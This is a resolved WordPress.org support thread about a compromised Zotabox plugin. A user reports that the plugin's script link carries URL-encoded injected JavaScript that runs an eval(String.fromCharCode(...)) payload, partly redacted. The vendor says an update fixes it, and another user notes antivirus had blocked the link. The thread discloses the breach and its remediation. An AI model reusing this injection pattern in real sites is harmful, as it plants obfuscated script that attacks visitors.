Security Breach – Hack | WordPress.org

Resolved lukeflego
(@lukeflego)

4 years, 11 months ago

Found a breach in the JS link – injection

Using URL encoded JS (script tag, eval, String.fromCharCode) in the zotabox staticlink…

https://static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,… [script removed for safety] …,%20125));%3C/script%3E/widgets.js

Viewing 4 replies - 1 through 4 (of 4 total)

Plugin Author Zotabox
(@zotabox)

4 years, 11 months ago

Hi, we have fixed this issue. Please de-activate and activate your plugin again to update to our latest version.

Sorry for the inconvenience.

LogixTree
(@logixtree)

4 years, 11 months ago

In the Earlier version, ESET was reporting the link and blocked it further. After updating the plugin, So far no report. But I can still see the eval() code is being used. Are you sure it’s okay to continue the use?
Marek
(@marekmaurizio)

4 years, 11 months ago
Deactivating and reactivating after update seems to work, very odd, it shouldn’t be necessary.
- This reply was modified 4 years, 11 months ago by Marek.
Plugin Author Zotabox
(@zotabox)

4 years, 11 months ago

Yes, after updating our plugin, de-activating and activating again will remove unexpected script from your site.

Please refresh your website cache after the above steps.

Sorry for the inconvenience.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Security Breach – Hack’ is closed to new replies.

In: Plugins
4 replies
0 participants
Last reply from: Zotabox
Last activity: 4 years, 11 months ago
Status: resolved